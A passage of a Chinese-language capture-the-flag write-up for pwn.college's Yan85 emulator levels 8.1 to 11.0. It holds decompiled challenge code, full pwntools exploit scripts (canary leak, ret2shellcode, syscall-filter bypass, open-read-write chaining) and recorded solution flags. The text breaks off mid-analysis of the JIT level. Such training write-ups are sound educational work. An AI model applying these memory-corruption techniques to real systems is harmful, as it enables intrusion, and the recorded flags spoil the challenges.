def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        send_payload(target, payload)

        response = target.recv()
        log.debug(response.decode("utf-8", errors="ignore"))
        target.recvuntil(b"... write")
        response = target.recv(0x30)

        canary, stack_base = leak_data(response)

        ret2shellcode = padding_to_canary
        ret2shellcode += p64(canary)
        ret2shellcode += padding_to_ret
        ret2shellcode += p64(stack_base - shellcode_offset)

        send_payload(target, ret2shellcode)

        response = target.recvall(timeout=3)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{wRfuRyCMy3WESGVx2pkEv3pQiJA.01MzMDL5cTNxgzW}

Level 8.1

Information

Category: Pwn

Description

Write a full exploit for a custom VM involving injecting shellcode, and a method of tricking the challenge into executing it by locating and utilizing a bug in the challenge.

Write-up

参见 Level 8.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-8-1"
HOST, PORT = "localhost", 1337

gdbscript = """
b write@plt
b read@plt
c
"""

shellcode_offset = 0x4ED
padding_to_canary = b"".ljust(0x9, b"A")
padding_to_ret = b"".ljust(0x8, b"A")


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    # stage 1: leak stack base address
    yancode = b"\x01\x40\x20"  # imm a, 0x01
    yancode += b"\xff\x40\x08"  # imm b, 0xff
    yancode += b"\x2f\x40\x10"  # imm c, 0x2f
    yancode += b"\x01\x80\x01"  # sys 0x01, d

    # stage 2: overwrite return address
    yancode += b"\x00\x40\x20"  # imm a, 0x00
    yancode += b"\xff\x40\x08"  # imm b, 0xff
    yancode += b"\x21\x40\x10"  # imm c, 0x21
    yancode += b"\x20\x80\x04"  # sys 0x02, a
    yancode += b"\xff\x40\x40"  # imm i, 0xff

    # stage 3: ret2shellcode
    shellcode = yancode
    shellcode += asm(shellcraft.chmod("f", 0o4))

    return shellcode


def leak_data(response):
    leaked_canary = response[-0x26:-0x1E]
    leaked_stack_base = response[-0x6:]
    log.success(f"Leaked canary: {to_hex_bytes(leaked_canary)}")
    log.success(f"Leaked stack base address: {to_hex_bytes(leaked_stack_base)}")

    return [
        int.from_bytes(leaked_canary, "little"),
        int.from_bytes(leaked_stack_base, "little"),
    ]


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        send_payload(target, payload)

        response = target.recv()
        log.debug(response.decode("utf-8", errors="ignore"))

        canary, stack_base = leak_data(response)

        ret2shellcode = padding_to_canary
        ret2shellcode += p64(canary)
        ret2shellcode += padding_to_ret
        ret2shellcode += p64(stack_base - shellcode_offset)

        send_payload(target, ret2shellcode)

        response = target.recvall(timeout=3)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{IX1KO9KJhczkci-cjl7VXfsQ-Qw.0FNzMDL5cTNxgzW}

Level 9.0

Information

Category: Pwn

Description

Provide your own Yan85 shellcode! This time, it's filtered.

Write-up

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+18h] [rbp-418h]
  int i; // [rsp+1Ch] [rbp-414h]
  _BYTE v5[1024]; // [rsp+20h] [rbp-410h] BYREF
  int v6; // [rsp+420h] [rbp-10h]
  __int16 v7; // [rsp+424h] [rbp-Ch]
  char v8; // [rsp+426h] [rbp-Ah]
  unsigned __int64 v9; // [rsp+428h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  printf("[+] Welcome to %s!\n", *argv);
  puts("[+] This challenge is an custom emulator. It emulates a completely custom");
  puts("[+] architecture that we call \"Yan85\"! You'll have to understand the");
  puts("[+] emulator to understand the architecture, and you'll have to understand");
  puts("[+] the architecture to understand the code being emulated, and you will");
  puts("[+] have to understand that code to get the flag. Good luck!");
  puts("[+]");
  puts("[+] This level is a full Yan85 emulator. You'll have to reason about yancode,");
  puts("[+] and the implications of how the emulator interprets it!");
  setvbuf(_bss_start, 0LL, 2, 1uLL);
  memset(v5, 0, sizeof(v5));
  v6 = 0;
  v7 = 0;
  v8 = 0;
  printf("[!] This time, YOU'RE in control! Please input your yancode: ");
  read(0, &v5[256], 0x300uLL);
  puts("[!] Are you ready for ultimate Yan85 shellcoding? This challenge only allows you ONE sys instruction!");
  v3 = 0;
  for ( i = 0; i <= 255; ++i )
  {
    if ( (v5[3 * i + 256] & 4) != 0 )
      ++v3;
  }
  if ( v3 > 1 )
    __assert_fail("num_syscalls <= 1", "/challenge/toddlerone-level-9-0.c", 0x1BAu, "main");
  puts("[+] This might seem impossible, but this challenge makes one memory error that will allow you");
  puts("[+] to execute the system calls you need. The error is what's known as an *intra-frame* overflow:");
  puts("[+] you won't be able to hijack control flow, but you'll be able to mess with the intended logic");
  puts("[+] of the emulator!");
  puts("[+]");
  puts("[+] This is a *teaching* challenge, which means that it will output");
  puts("[+] a trace of the Yan85 code as it processes it. The output is here");
  puts("[+] for you to understand what the challenge is doing, and you should use");
  puts("[+] it as a guide to help with your reversing of the code.");
  puts("[+]");
  interpreter_loop(v5);
}

这题把 orw 系统调用都开放了，所以我们可以考虑能不能直接通过 orw 拿 flag。main 逻辑是把我们的输入数据读到 &v5[256] 处，然后绿色部分是一个 filter，负责判断 256 组三字节指令是否包含 syscall 的 opcode，包含则增加 v3，v3 > 1 则断言失败。所以简单来说就是我们输入的数据最多只能使用一个 syscall。

好办，我们知道 interpreter_loop(v5) 会不断读取并执行下一条指令：

void __fastcall __noreturn interpreter_loop(__int64 a1)
{
  unsigned __int8 v1; // al

  while ( 1 )
  {
    v1 = *(_BYTE *)(a1 + 1029);
    *(_BYTE *)(a1 + 1029) = v1 + 1;
    interpret_instruction(
      a1,
      *(unsigned __int16 *)(a1 + 3LL * v1 + 256) | ((unsigned __int64)*(unsigned __int8 *)(a1 + 3LL * v1 + 258) << 16));
  }
}

如果我们先提供一个 read syscall，把我们的 shellcode 读到 &v5[255] 处，是不是绕过了 filter？而之后因为 rip 一直在改变，我们是不是需要填充一些垃圾值占位那些我们执行过的指令？在此之后就是我们当前的 rip 了，在这里写 shellcode，是不是就接着执行了？

妙哉，开撸！

~话说为什么我每次一有思路的时候就正好播放***《雾里》***了？好的，单曲循环直到打通 LMAO~

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    context,
    gdb,
    log,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-9-0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *main+287
b *sys_read+43
b *sys_open+43
b *sys_write+43
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage):
    if stage == 1:
        # read the shellcode to where is out of the filter's range
        yancode = b"\x80\x08\x00"  # imm a, 0x00
        yancode += b"\x80\x02\xff"  # imm b, 0xff
        yancode += b"\x80\x01\xff"  # imm c, 0xff
        yancode += b"\x04\x10\x08"  # sys 0x10, a

        return yancode
    elif stage == 2:
        # padding to rip
        yancode = b"\x00" * 13

        # construct "/flag" string
        yancode += b"\x80\x08\x00"  # imm a, 0x00
        yancode += b"\x80\x02\x2f"  # imm b, 0x2f
        yancode += b"\x40\x08\x02"  # stm a, b
        yancode += b"\x80\x08\x01"  # imm a, 0x01
        yancode += b"\x80\x02\x66"  # imm b, 0x66
        yancode += b"\x40\x08\x02"  # stm a, b
        yancode += b"\x80\x08\x02"  # imm a, 0x02
        yancode += b"\x80\x02\x6c"  # imm b, 0x6c
        yancode += b"\x40\x08\x02"  # stm a, b
        yancode += b"\x80\x08\x03"  # imm a, 0x03
        yancode += b"\x80\x02\x61"  # imm b, 0x61
        yancode += b"\x40\x08\x02"  # stm a, b
        yancode += b"\x80\x08\x04"  # imm a, 0x04
        yancode += b"\x80\x02\x67"  # imm b, 0x67
        yancode += b"\x40\x08\x02"  # stm a, b

        # open /flag
        yancode += b"\x80\x08\x00"  # imm a, 0x00
        yancode += b"\x80\x02\x00"  # imm b, 0x00
        yancode += b"\x04\x01\x08"  # sys 0x01, a

        # read
        yancode += b"\x80\x02\x08"  # imm b, 0x08
        yancode += b"\x80\x01\xff"  # imm c, 0xff
        yancode += b"\x04\x10\x08"  # sys 0x10, a

        # write
        yancode += b"\x80\x08\x01"  # imm a, 0x01
        yancode += b"\x04\x08\x08"  # sys 0x08 a

        return yancode
    else:
        log.error("Invalid stage number.")


def extract_flag(target):
    try:
        target.recvuntil(b"pwn.college{")
        flag = target.recv(0xFF)
        log.success(f"pwn.college{{{flag.decode("utf-8")}")
        exit()
    except Exception as e:
        log.exception(f"An error occurred while extracting flag: {e}")


def attack(target, payload):
    try:
        send_payload(target, payload)

        payload = construct_payload(2)
        send_payload(target, payload)

        extract_flag(target)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{UDbugZTc3krZyqHikNYIwlOG2I2.0VNzMDL5cTNxgzW}

Level 9.1

Information

Category: Pwn

Description

Provide your own Yan85 shellcode! This time, it's filtered.

Write-up

参见 Level 9.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    context,
    gdb,
    log,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-9-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage):
    if stage == 1:
        # read the shellcode to where is out of the filter's range
        yancode = b"\x00\x02\x80"  # imm a, 0x00
        yancode += b"\xff\x20\x80"  # imm b, 0xff
        yancode += b"\xff\x04\x80"  # imm c, 0xff
        yancode += b"\x02\x02\x10"  # sys 0x02, a

        return yancode
    elif stage == 2:
        # padding to rip
        yancode = b"\x00" * 13

        # construct "/flag" string
        yancode += b"\x00\x02\x80"  # imm a, 0x00
        yancode += b"\x2f\x20\x80"  # imm b, 0x2f
        yancode += b"\x20\x02\x04"  # stm a, b
        yancode += b"\x01\x02\x80"  # imm a, 0x01
        yancode += b"\x66\x20\x80"  # imm b, 0x66
        yancode += b"\x20\x02\x04"  # stm a, b
        yancode += b"\x02\x02\x80"  # imm a, 0x02
        yancode += b"\x6c\x20\x80"  # imm b, 0x6c
        yancode += b"\x20\x02\x04"  # stm a, b
        yancode += b"\x03\x02\x80"  # imm a, 0x03
        yancode += b"\x61\x20\x80"  # imm b, 0x61
        yancode += b"\x20\x02\x04"  # stm a, b
        yancode += b"\x04\x02\x80"  # imm a, 0x04
        yancode += b"\x67\x20\x80"  # imm b, 0x67
        yancode += b"\x20\x02\x04"  # stm a, b

        # open /flag
        yancode += b"\x00\x02\x80"  # imm a, 0x00
        yancode += b"\x00\x20\x80"  # imm b, 0x00
        yancode += b"\x02\x20\x10"  # sys 0x20, a

        # read
        yancode += b"\x08\x20\x80"  # imm b, 0x08
        yancode += b"\xff\x04\x80"  # imm c, 0xff
        yancode += b"\x02\x02\x10"  # sys 0x02, a

        # write
        yancode += b"\x01\x02\x80"  # imm a, 0x01
        yancode += b"\x02\x01\x10"  # sys 0x01 a

        return yancode
    else:
        log.error("Invalid stage number.")


def extract_flag(target):
    try:
        target.recvuntil(b"pwn.college{")
        flag = target.recv(0xFF)
        log.success(f"pwn.college{{{flag.decode("utf-8")}")
        exit()
    except Exception as e:
        log.exception(f"An error occurred while extracting flag: {e}")


def attack(target, payload):
    try:
        send_payload(target, payload)

        payload = construct_payload(2)
        send_payload(target, payload)

        extract_flag(target)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{kV-lC4_vz8LW0vUOLmZ5sKafrjA.0lNzMDL5cTNxgzW}

Level 10.0

Information

Category: Pwn

Description

The ultimate Yan85 challenge. Provide your own Yan85 shellcode.

Write-up

这题解法很巧妙，我们不能像 Level 9 一样绕过 filter。但是注意观察 interpret_sys 的实现，我们发现，里面每一个 if 语句无论成立与否都会继续判断下一条 if：

int __fastcall interpret_sys(unsigned __int8 *a1, int a2)
{
  const char *v2; // rax
  unsigned __int8 v3; // al
  unsigned __int64 v4; // rax
  unsigned __int8 v5; // al
  unsigned __int64 v6; // rax
  unsigned __int8 v7; // al
  unsigned __int8 v8; // al
  int result; // eax
  int v10; // ebx
  const char *v11; // rax

  v2 = (const char *)describe_register(BYTE2(a2));
  printf("[s] SYS %#hhx %s\n", BYTE1(a2), v2);
  if ( (a2 & 0x100) != 0 )
  {
    puts("[s] ... open");
    v3 = sys_open(a1, &a1[a1[1024] + 768], a1[1025], a1[1026]);
    write_register(a1, BYTE2(a2), v3);
  }
  if ( (a2 & 0x2000) != 0 )
    crash(a1, "Disallowed system call: SYS_READ_CODE");
  if ( (a2 & 0x1000) != 0 )
  {
    puts("[s] ... read_memory");
    v4 = a1[1026];
    if ( 256 - a1[1025] <= v4 )
      LOBYTE(v4) = -a1[1025];
    v5 = sys_read(a1, a1[1024], &a1[a1[1025] + 768], (unsigned __int8)v4);
    write_register(a1, BYTE2(a2), v5);
  }
  if ( (a2 & 0x200) != 0 )
  {
    puts("[s] ... write");
    v6 = a1[1026];
    if ( 256 - a1[1025] <= v6 )
      LOBYTE(v6) = -a1[1025];
    v7 = sys_write(a1, a1[1024], &a1[a1[1025] + 768], (unsigned __int8)v6);
    write_register(a1, BYTE2(a2), v7);
  }
  if ( (a2 & 0x400) != 0 )
  {
    puts("[s] ... sleep");
    v8 = sys_sleep(a1, a1[1024]);
    write_register(a1, BYTE2(a2), v8);
  }
  if ( (a2 & 0x800) != 0 )
  {
    puts("[s] ... exit");
    sys_exit(a1, a1[1024]);
  }
  result = BYTE2(a2);
  if ( BYTE2(a2) )
  {
    v10 = (unsigned __int8)read_register(a1, BYTE2(a2));
    v11 = (const char *)describe_register(BYTE2(a2));
    return printf("[s] ... return value (in register %s): %#hhx\n", v11, v10);
  }
  return result;
}

Sooooooo，我们把 orw 串起来就好了，实现用一条指令调用多个 syscall！

Exploit

#!/usr/bin/python

from pwn import log, os


def construct_payload():
    yancode = b"\x01\x02\x00"  # imm a, 0x00
    yancode += b"\x01\x40\x66"  # imm b, 0x66
    yancode += b"\x20\x02\x40"  # stm a, b
    yancode += b"\x01\x40\x00"  # imm b, 0x00
    yancode += b"\x01\x10\xff"  # imm c, 0xff
    yancode += b"\x80\x13\x02"  # orw

    return yancode


def save_shellcode_to_file(filename):
    payload = construct_payload()

    try:
        with open(filename, "wb") as f:
            f.write(payload)
    except Exception as e:
        log.exception(f"An error occurred while saving shellcode to file: {e}")


def main():
    try:
        os.system("ln -s /flag f")

        save_shellcode_to_file("shellcode")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

令我感到奇怪的是 exp 中使用 os.dup2(1, 57) 并不能将 fd 57 redirect 到 stdout。但是将 shellcode 写到文件中，再将其作为 stdin 传给程序，并重定向 fd 57 到 stdout 就可以。

./toddlerone-level-10-0 < shellcode 57>&1 > output

Flag

Flag: pwn.college{c8a_GFOYLKgE8O8i-6oZxhhzxgi.01NzMDL5cTNxgzW}

Level 10.1

Information

Category: Pwn

Description

The ultimate Yan85 challenge. Provide your own Yan85 shellcode.

Write-up

参见 Level 10.0。

Exploit

#!/usr/bin/python

from pwn import log, os


def construct_payload():
    yancode = b"\x40\x10\x00"  # imm a, 0x00
    yancode += b"\x40\x20\x66"  # imm b, 0x66
    yancode += b"\x04\x10\x20"  # stm a, b
    yancode += b"\x40\x20\x00"  # imm b, 0x00
    yancode += b"\x40\x04\xff"  # imm c, 0xff
    yancode += b"\x02\x2a\x10"  # orw

    return yancode


def save_shellcode_to_file(filename):
    payload = construct_payload()

    try:
        with open(filename, "wb") as f:
            f.write(payload)
    except Exception as e:
        log.exception(f"An error occurred while saving shellcode to file: {e}")


def main():
    try:
        os.system("ln -s /flag f")

        save_shellcode_to_file("shellcode")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{oWpBceTnbTClQqRYa8nwc5Pi1b9.0FOzMDL5cTNxgzW}

Level 10 做完也是直接从第七杀入前三了 LOL

Level 11.0

Information

Category: Pwn

Description

The ultimate Yan85 challenge. Provide your own Yan85 shellcode. Now updated for modern hardware!

Write-up

终于到了传说中的 JIT (Just-in-time compilation)，也是本章节最后的 BOSS! 之前看这一章讲义的时候就觉得这是一个很高端的东西。是的，我懂，我懂，又是一道令我仰望的题（其实当时看讲义觉得利用应该也没那么难，只是概念对我来说比较新，因为是第一次接触吧。<s>这种情境仿佛一夜之间世界从蒸汽时代飞跃至信息化巅峰，众人皆已驾驭现代科技，我却恍如沉醉于旧工业的残梦未醒……忽而惊觉，恍若隔世，徒留错愕于时代洪流之中……</s>）……Brain 以自动为您触发被动 skill 畏难 :skull:

话不多说，直接开干！迎面袭来的，是刺鼻的恶臭，嗅……嗯，纯正的，错不了，是逆向分析！/丧中没有一丝燃，好熟悉……

通常这种硬核难题都是，熬过最折磨人的逆向阶段后，神挡杀神、佛挡杀佛，最好如此。~/某人试图自我打气~

你熟悉又陌生的 main 姑娘：

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+18h] [rbp-2818h]
  _BYTE s[2064]; // [rsp+20h] [rbp-2810h] BYREF
  void *addr; // [rsp+2020h] [rbp-810h]
  unsigned __int64 v7; // [rsp+2828h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  printf("[+] Welcome to %s!\n", *argv);
  puts("[+] This challenge is an custom emulator. It emulates a completely custom");
  puts("[+] architecture that we call \"Yan85\"! You'll have to understand the");
  puts("[+] emulator to understand the architecture, and you'll have to understand");
  puts("[+] the architecture to understand the code being emulated, and you will");
  puts("[+] have to understand that code to get the flag. Good luck!");
  puts("[+]");
  puts("[+] This level is a full Yan85 emulator. You'll have to reason about yancode,");
  puts("[+] and the implications of how the emulator interprets it!");
  puts("[X]");
  puts("[X] Arizona State University is proud to present a NEW version of Yan85:");
  puts("[X] Yan85_64! This is a beta preview of the cutting-edge technology, armed");
  puts("[X] with the latest in security mitigations. Hopefully, we didn't forget to");
  puts("[X] check all the memory accesses properly, though you never know....");
  puts("[X]");
  setvbuf(_bss_start, 0LL, 2, 1uLL);
  memset(s, 0, 0x2808uLL);
  printf("[!] This time, YOU'RE in control! Please input your yancode: ");
  read(0, s, 0x1800uLL);
  puts("[+]");
  puts("[+] This is a *teaching* challenge, which means that it will output");
  puts("[+] a trace of the Yan85 code as it processes it. The output is here");
  puts("[+] for you to understand what the challenge is doing, and you should use");
  puts("[+] it as a guide to help with your reversing of the code.");
  puts("[+]");
  addr = mmap((void *)0x1337000, 0x1000uLL, 7, 34, 0, 0LL);
  v4 = emit_program(s);
  if ( mprotect(addr, 0x1000uLL, 5) )
    __assert_fail(
      "mprotect(state.compiled_code, 0x1000, PROT_READ|PROT_EXEC) == 0",
      "/challenge/toddlerone-level-11-0.c",
      0x323u,
      "main");
  puts("[!] Your yancode has been JITed! The result is the following x86_64 code:");
  print_disassembly(addr, v4 - (_QWORD)addr);
  ((void (*)(void))addr)();
  return 0;
}

注意到 read 可以造成栈溢出，暂时不知道有没有用，先记录一下。

mmap 在 0x1337000 分配了 0x1000 bytes 的 rwx 空间，通过后续的分析我们知道这个地址是用来存放编译后代码的。

之后进入了 emit_program(s)。返回后移除了编译后代码处的写权限，调用 print_disassembly(addr, v4 - (_QWORD)addr) 输出编译后的机器码及其反汇编，最后通过 ((void (*)(void))addr)() 执行编译后代码。

_BYTE *__fastcall emit_program(__int64 a1)
{
  _BYTE *v1; // rax
  _BYTE *v2; // rax
  _BYTE *v3; // rax
  _BYTE *v4; // rax
  _BYTE *v5; // rax
  _BYTE *v6; // rax
  int v7; // r8d
  int v8; // r9d
  int i; // [rsp+14h] [rbp-Ch]
  _BYTE *v11; // [rsp+18h] [rbp-8h]
  _QWORD *v12; // [rsp+18h] [rbp-8h]
  _BYTE *v13; // [rsp+18h] [rbp-8h]

  v11 = *(_BYTE **)(a1 + 0x2000);
  puts("[e] emitting initialization code");
  v1 = helper_mov_imm(a1, v11, 32LL, 0LL);
  v2 = helper_mov_imm(a1, v1, 64LL, 0LL);
  v3 = helper_mov_imm(a1, v2, 16LL, 0LL);
  v4 = helper_mov_imm(a1, v3, 8LL, 0LL);
  v5 = helper_mov_imm(a1, v4, 4LL, 0LL);
  v6 = helper_mov_imm(a1, v5, 2LL, 0LL);
  v12 = helper_mov_imm(a1, v6, 1LL, 0LL);
  for ( i = 0; i <= 255; ++i )
  {
    *(_QWORD *)(a1 + 8 * (i + 1024LL) + 8) = (char *)v12 - *(_QWORD *)(a1 + 0x2000);
    printf("[e] instruction %d to %p (offset %#x from base)\n", i, v12, *(_QWORD *)(a1 + 8 * (i + 1024LL) + 8));
    *(_BYTE *)v12 = 73;
    v13 = (char *)v12 + 1;
    *v13++ = -57;
    *v13++ = -63;
    *(_DWORD *)v13 = i;
    v12 = (_QWORD *)emit_instruction(
                      a1,
                      (int)v13 + 4,
                      i,
                      a1,
                      v7,
                      v8,
                      *(_QWORD *)(a1 + 24LL * i),
                      *(_QWORD *)(a1 + 24LL * i + 8),
                      *(_QWORD *)(a1 + 24LL * i + 16));
  }
  printf("[e] compiled %d instructions!\n", i);
  return emit_end(a1, v12);
}

v11 = *(_BYTE **)(a1 + 0x2000) 的作用是取编译后代码的起始地址 (_BYTE *)。

emitting initialization code 后的七个 helper_mov_imm 负责初始化一些寄存器的值。深入其内部我们知道，这个函数的作用就是负责将我们输入的 imm 的 yancode 翻译为 amd64 中的 movabs 指令的机器码：

_QWORD *__fastcall helper_mov_imm(__int64 a1, _BYTE *a2, __int64 a3, __int64 a4)
{
  _QWORD *v5; // [rsp+10h] [rbp-10h]

  switch ( a3 )
  {
    case 32LL:
      *a2 = 73;
      a2[1] = -70;
      v5 = a2 + 2;
      break;
    case 64LL:
      *a2 = 73;
      a2[1] = -69;
      v5 = a2 + 2;
      break;
    case 16LL:
      *a2 = 73;
      a2[1] = -68;
      v5 = a2 + 2;
      break;
    case 8LL:
      *a2 = 73;
      a2[1] = -67;
      v5 = a2 + 2;
      break;
    case 4LL:
      *a2 = 73;
      a2[1] = -66;
      v5 = a2 + 2;
      break;
    case 2LL:
      *a2 = 73;
      a2[1] = -65;
      v5 = a2 + 2;
      break;
    case 1LL:
      *a2 = 73;
      a2[1] = -71;
      v5 = a2 + 2;
      break;
    default:
      crash(a1, "Unknown register in emit_imm");
  }
  *v5 = a4;
  return v5 + 1;
}

通过观察运行结果我们知道这七条指令分别对应了：

0x0000000001337000 | 49 ba 00 00 00 00 00 00 00 00                 | movabs r10, 0
0x000000000133700a | 49 bb 00 00 00 00 00 00 00 00                 | movabs r11, 0
0x0000000001337014 | 49 bc 00 00 00 00 00 00 00 00                 | movabs r12, 0
0x000000000133701e | 49 bd 00 00 00 00 00 00 00 00                 | movabs r13, 0
0x0000000001337028 | 49 be 00 00 00 00 00 00 00 00                 | movabs r14, 0
0x0000000001337032 | 49 bf 00 00 00 00 00 00 00 00                 | movabs r15, 0
0x000000000133703c | 49 b9 00 00 00 00 00 00 00 00                 | movabs r9, 0

进入循环体内部，*(_QWORD *)(a1 + 8 * (i + 1024LL) + 8) = (char *)v12 - *(_QWORD *)(a1 + 0x2000); 负责计算当前指令相对于 v11 的偏移，单位是字节。

之后 for 循环默认会生成 256 条占位指令（如果你没有输入任何 yancode）。结果差不多是下面这样，每隔一条指令 arg2 这个立即数增加 0x1：

0x0000000001337046 | 49 c7 c1 00 00 00 00                          | mov r9, 0
0x000000000133704d | 49 c7 c1 01 00 00 00                          | mov r9, 1
0x0000000001337054 | 49 c7 c1 02 00 00 00                          | mov r9, 2
  <snap>
0x0000000001337731 | 49 c7 c1 fd 00 00 00                          | mov r9, 0xfd
0x0000000001337738 | 49 c7 c1 fe 00 00 00                          | mov r9, 0xfe
0x000000000133773f | 49 c7 c1 ff 00 00 00                          | mov r9, 0xff

接下来，就是我们最关心的 yancode 如何解析了。为了方便查阅理解，这里把调用部分单独贴出来：

// <snap>
for ( i = 0; i <= 255; ++i )
{
  *(_QWORD *)(a1 + 8 * (i + 1024LL) + 8) = (char *)v12 - *(_QWORD *)(a1 + 0x2000);
  printf("[e] instruction %d to %p (offset %#x from base)\n", i, v12, *(_QWORD *)(a1 + 8 * (i + 1024LL) + 8));
  *(_BYTE *)v12 = 73;
  v13 = (char *)v12 + 1;
  *v13++ = -57;
  *v13++ = -63;
  *(_DWORD *)v13 = i;
  v12 = (_QWORD *)emit_instruction(
      a1,
      (int)v13 + 4,
      i,
      a1,
      v7,
      v8,
      *(_QWORD *)(a1 + 24LL * i),
      *(_QWORD *)(a1 + 24LL * i + 8),
      *(_QWORD *)(a1 + 24LL * i + 16)
  );
}
// <snap>

(int)v13 + 4 代表下一条指令的起始地址。*(_QWORD *)(a1 + 24LL * i + 16) 是 a9，观察下面的 emit_instruction 的具体实现我们知道程序通过这个参数来判断需要把 yancode 解析成什么指令，所以它就是 opcode 位。

__int64 __fastcall emit_instruction(
        int a1,
        __int64 a2,
        __int64 a3,
        int a4,
        int a5,
        int a6,
        __int64 a7,
        __int64 a8,
        __int64 a9)
{
  __int64 v10; // [rsp+0h] [rbp-10h]

  v10 = a2;
  if ( (a9 & 0x40) != 0 )
    v10 = emit_imm(a1, a2, a2, a4, a5, a6, a7, a8);
  if ( (a9 & 4) != 0 )
    v10 = emit_add(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 1) != 0 )
    v10 = emit_stk(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 0x10) != 0 )
    v10 = emit_stm(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 0x80) != 0 )
    v10 = emit_ldm(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 0x20) != 0 )
    v10 = emit_cmp(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 8) != 0 )
    v10 = emit_jmp(a1, v10, v10, a4, a5, a6, a7, a8);
  if ( (a9 & 2) != 0 )
    emit_sys(a1, v10, v10, a4, a5, a6, a7, a8);
  return v10;
}

就以 imm 为例吧，首先得满足 (*(_QWORD *)(a1 + 24LL * i + 16) & 40) != 0，那就是 b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" ;-; 我也不知道是不是应该写出来，但是真的好长啊……

__int64 __fastcall emit_imm(
        __int64 a1,
        _BYTE *a2,
        __int64 a3,
        __int64 a4,
        __int64 a5,
        __int64 a6,
        __int64 a7,
        __int64 a8)
{
  const char *v8; // rax
  _QWORD *v10; // [rsp+0h] [rbp-20h]

  v8 = (const char *)describe_register(a7);
  printf("[e] compiling IMM %s = %#hhx to %p\n", v8, a8, a2);
  v10 = helper_mov_imm(a1, a2, a7, a8);
  if ( a7 == 1 )
    return helper_jmp_i(a1, v10);
  return (__int64)v10;
}

然后注意到 (const char *)describe_register(a7)，说明 a7，也就是 *(_QWORD *)(a1 + 24LL * i) 代表寄存器，结合下面的 printf 可知它是 arg1。a8，也就是 *(_QWORD *)(a1 + 24LL * i + 8) 代表 arg2，是一个立即数。

那么最终 yancode 格式应该是 arg1, arg2, opcode 这样的，注意每个参数位都是一个 QWORD。

__int64 __fastcall emit_imm(
        __int64 a1,
        const void *a2,
        __int64 a3,
